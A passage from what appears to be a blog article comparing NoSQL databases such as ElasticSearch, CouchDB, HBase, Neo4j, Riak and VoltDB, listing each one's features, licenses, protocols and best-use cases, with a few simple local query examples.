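No schema migration is needed to start filtering on a new field; the index is optional, but keeps the query fast.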

ElasticSearch (0.20.1)

  • Written in: Java
  • Main point: Advanced Search
  • License: Apache
  • Protocol: JSON over HTTP (Plugins: Thrift, memcached)
  • Stores JSON documents
  • Has versioning
  • Parent and children documents
  • Documents can time out
  • Very versatile and sophisticated querying, scriptable
  • Write consistency: one, quorum or all
  • Sorting by score (!)
  • Geo distance sorting
  • Fuzzy searches (approximate date, etc) (!)
  • Asynchronous replication
  • Atomic, scripted updates (good for counters, etc)
  • Can maintain automatic “stats groups” (good for debugging)
  • Still depends very much on only one developer (kimchy).

Best used: When you have objects with (flexible) fields, and you need “advanced search” functionality.
For example: A dating service that handles age difference, geographic location, tastes and dislikes, etc. Or a leaderboard system that depends on many variables.
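A minimal range-query sketch against the HTTP interface (index and field names are invented):

$ curl -XGET 'http://localhost:9200/people/_search' -d '{"query": {"range": {"age": {"gte": 25, "lte": 35}}}}'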

Classic document and BigTable stores

CouchDB (V1.2)

  • Written in: Erlang
  • Main point: DB consistency, ease of use
  • License: Apache
  • Protocol: HTTP/REST
  • Bi-directional (!) replication,
  • continuous or ad-hoc,
  • with conflict detection,
  • thus, master-master replication. (!)
  • MVCC – write operations do not block reads
  • Previous versions of documents are available
  • Crash-only (reliable) design
  • Needs compacting from time to time
  • Views: embedded map/reduce
  • Formatting views: lists & shows
  • Server-side document validation possible
  • Authentication possible
  • Real-time updates via ‘_changes’ (!)
  • Attachment handling
  • thus, CouchApps (standalone js apps)

Best used: For accumulating, occasionally changing data, on which pre-defined queries are to be run. Places where versioning is important.
For example: CRM, CMS systems. Master-master replication is an especially interesting feature, allowing easy multi-site deployments.
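The real-time ‘_changes’ feed mentioned above is plain HTTP; for example, to follow a database continuously (database name invented):

$ curl 'http://localhost:5984/crm/_changes?feed=continuous&since=0'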

Accumulo (1.4)

  • Written in: Java and C++
  • Main point: A BigTable with Cell-level security
  • License: Apache
  • Protocol: Thrift
  • Another BigTable clone, also runs on top of Hadoop
  • Originally from the NSA
  • Cell-level security
  • Bigger rows than memory are allowed
  • Keeps a memory map outside Java, in C++ STL
  • Map/reduce using Hadoop’s facilities (ZooKeeper & co)
  • Some server-side programming

Best used: If you need to restrict access on the cell level.
For example: Same as HBase, since it’s basically a replacement: Search engines. Analysing log data. Any place where scanning huge, two-dimensional join-less tables are a requirement.

HBase (V0.92.0)

  • Written in: Java
  • Main point: Billions of rows X millions of columns
  • License: Apache
  • Protocol: HTTP/REST (also Thrift)
  • Modeled after Google’s BigTable
  • Uses Hadoop’s HDFS as storage
  • Map/reduce with Hadoop
  • Query predicate push down via server side scan and get filters
  • Optimizations for real time queries
  • A high performance Thrift gateway
  • HTTP supports XML, Protobuf, and binary
  • Jruby-based (JIRB) shell
  • Rolling restart for configuration changes and minor upgrades
  • Random access performance is like MySQL
  • A cluster consists of several different types of nodes

Best used: Hadoop is probably still the best way to run Map/Reduce jobs on huge datasets. Best if you use the Hadoop/HDFS stack already.
For example: Search engines. Analysing log data. Any place where scanning huge, two-dimensional join-less tables are a requirement.

Hypertable (0.9.6.5)

  • Written in: C++
  • Main point: A faster, smaller HBase
  • License: GPL 2.0
  • Protocol: Thrift, C++ library, or HQL shell
  • Implements Google’s BigTable design
  • Runs on Hadoop’s HDFS
  • Uses its own, “SQL-like” language, HQL
  • Can search by key, by cell, or for values in column families.
  • Search can be limited to key/column ranges.
  • Sponsored by Baidu
  • Retains the last N historical values
  • Tables are in namespaces
  • Map/reduce with Hadoop

Best used: If you need a better HBase.
For example: Same as HBase, since it’s basically a replacement: Search engines. Analysing log data. Any place where scanning huge, two-dimensional join-less tables are a requirement.

Graph databases

Neo4j (V1.5M02)

  • Written in: Java
  • Main point: Graph database – connected data
  • License: GPL, some features AGPL/commercial
  • Protocol: HTTP/REST (or embedding in Java)
  • Standalone, or embeddable into Java applications
  • Full ACID conformity (including durable data)
  • Both nodes and relationships can have metadata
  • Integrated pattern-matching-based query language (“Cypher”)
  • Also the “Gremlin” graph traversal language can be used
  • Indexing of nodes and relationships
  • Nice self-contained web admin
  • Advanced path-finding with multiple algorithms
  • Indexing of keys and relationships
  • Optimized for reads
  • Has transactions (in the Java API)
  • Scriptable in Groovy
  • Clustering, caching, online backup, advanced monitoring and High Availability is AGPL/commercial licensed

Best used: For graph-style, rich or complex, interconnected data.
For example: For searching routes in social relations, public transport links, road maps, or network topologies.
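A Cypher sketch in the syntax of this era (the node IDs and the KNOWS relationship type are invented), finding a shortest route between two people:

START a=node(1), b=node(2)
MATCH p = shortestPath(a-[:KNOWS*..5]-b)
RETURN p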

OrientDB (2.0)

  • Written in: Java
  • Main point: Document-based graph database
  • License: Apache 2.0
  • Protocol: Java API, binary or HTTP REST/JSON
  • Has transactions
  • Can be used both as a document and as a graph database (vertices with properties)
  • Multi-master architecture
  • Supports relationships between documents via persistent pointers (LINK, LINKSET, LINKMAP, LINKLIST field types)
  • SQL-like query language (Note: no JOIN, but there are pointers)
  • Web-based GUI (quite good-looking)
  • Inheritance between classes
  • User functions in SQL or JavaScript
  • Sharding
  • Advanced monitoring, online backups are commercially licensed

Best used: For graph-style, rich or complex, interconnected data.
For example: For searching routes in social relations, public transport links, road maps, or network topologies.

The “long tail”
(Not widely known, but definitely worthy ones)

Couchbase (ex-Membase) (2.0)

  • Written in: Erlang & C
  • Main point: Memcache compatible, but with persistence and clustering
  • License: Apache
  • Protocol: memcached + extensions
  • Very fast (200k+/sec) access of data by key
  • Persistence to disk
  • All nodes are identical (master-master replication)
  • Provides memcached-style in-memory caching buckets, too
  • Write de-duplication to reduce IO
  • Friendly cluster-management web GUI
  • Connection proxy for connection pooling and multiplexing (Moxi)
  • Incremental map/reduce
  • Cross-datacenter replication

Best used: Any application where low-latency data access, high concurrency support and high availability is a requirement.
For example: Low-latency use-cases like ad targeting or highly-concurrent web apps like online gaming (e.g. Zynga).

Scalaris (0.5)

  • Written in: Erlang
  • Main point: Distributed P2P key-value store
  • License: Apache
  • Protocol: Proprietary & JSON-RPC
  • In-memory (disk when using Tokyo Cabinet as a backend)
  • Uses YAWS as a web server
  • Has transactions (an adapted Paxos commit)
  • Consistent, distributed write operations
  • From CAP, values Consistency over Availability (in case of network partitioning, only the bigger partition works)

Best used: If you like Erlang and wanted to use Mnesia or DETS or ETS, but you need something that is accessible from more languages (and scales much better than ETS or DETS).
For example: In an Erlang-based system when you want to give access to the DB to Python, Ruby or Java programmers.

Aerospike (3.3)

  • Written in: C
  • Main point: Speed, SSD-optimized storage
  • License: License: AGPL (Client: Apache)
  • Protocol: Proprietary
  • Cross-datacenter replication is commercially licensed
  • Very fast access of data by key
  • Uses SSD devices as a block device to store data (RAM + persistence also available)
  • Automatic failover and automatic rebalancing of data when nodes are added to or removed from the cluster
  • User Defined Functions in Lua
  • Cluster management with Web GUI
  • Has complex data types (lists and maps) as well as simple (integer, string, blob)
  • Secondary indices
  • Aggregation query model
  • Data can be set to expire with a time-to-live (TTL)

Best used: Any application where low-latency data access, high concurrency support and high availability is a requirement.
For example: Storing massive amounts of profile data in online advertising or retail Web sites.

Riak (V1.2)

  • Written in: Erlang & C, some JavaScript
  • Main point: Fault tolerance
  • License: Apache
  • Protocol: HTTP/REST or custom binary
  • Stores blobs
  • Tunable trade-offs for distribution and replication
  • Pre- and post-commit hooks in JavaScript or Erlang, for validation and security.
  • Map/reduce in JavaScript or Erlang
  • Links & link walking: use it as a graph database
  • Secondary indices: but only one at once
  • Large object support (Luwak)
  • Comes in “open source” and “enterprise” editions
  • Full-text search, indexing, querying with Riak Search
  • In the process of migrating the storage backend from “Bitcask” to Google’s “LevelDB”
  • Masterless multi-site replication and SNMP monitoring are commercially licensed

Best used: If you want something Dynamo-like for data storage, but no way you’re gonna deal with the bloat and complexity. If you need very good single-site scalability, availability and fault-tolerance, but you’re ready to pay for multi-site replication.
For example: Point-of-sales data collection. Factory control systems. Places where even seconds of downtime hurt. Could be used as a well-update-able web server.
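Storing and fetching a blob over the HTTP interface looks roughly like this (bucket and key names are invented):

$ curl -X PUT http://localhost:8098/buckets/sales/keys/receipt-1 -H 'Content-Type: application/json' -d '{"total": 42}'
$ curl http://localhost:8098/buckets/sales/keys/receipt-1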

VoltDB (2.8.4.1)

  • Written in: Java
  • Main point: Fast transactions and rapidly changing data
  • License: GPL 3
  • Protocol: Proprietary
  • In-memory relational database.
  • Can export data into Hadoop
  • Supports ANSI SQL
  • Stored procedures in Java
  • Cross-datacenter replication

Best used: Where you need to act fast on massive amounts of incoming data.
For example: Point-of-sales data analysis. Factory control systems.

Kyoto Tycoon (0.9.56)

  • Written in: C++
  • Main point: A lightweight network DBM
  • License: GPL
  • Protocol: HTTP (TSV-RPC or REST)
  • Based on Kyoto Cabinet, Tokyo Cabinet’s successor
  • Multitudes of storage backends: Hash, Tree, Dir, etc (everything from Kyoto Cabinet)
  • Kyoto Cabinet can do 1M+ insert/select operations per sec (but Tycoon does less because of overhead)
  • Lua on the server side
  • Language bindings for C, Java, Python, Ruby, Perl, Lua, etc
  • Uses the “visitor” pattern
  • Hot backup, asynchronous replication
  • background snapshot of in-memory databases
  • Auto expiration (can be used as a cache server)

Best used: When you want to choose the backend storage algorithm engine very precisely. When speed is of the essence.
For example: Caching server. Stock prices. Analytics. Real-time data collection. Real-time communication. And wherever you used memcached before.

Of course, all these systems have many more features than what’s listed here. I only wanted to list the key points that I base my decisions on. Also, all of them are developing very fast, so things are bound to change.
Discussion on Hacker News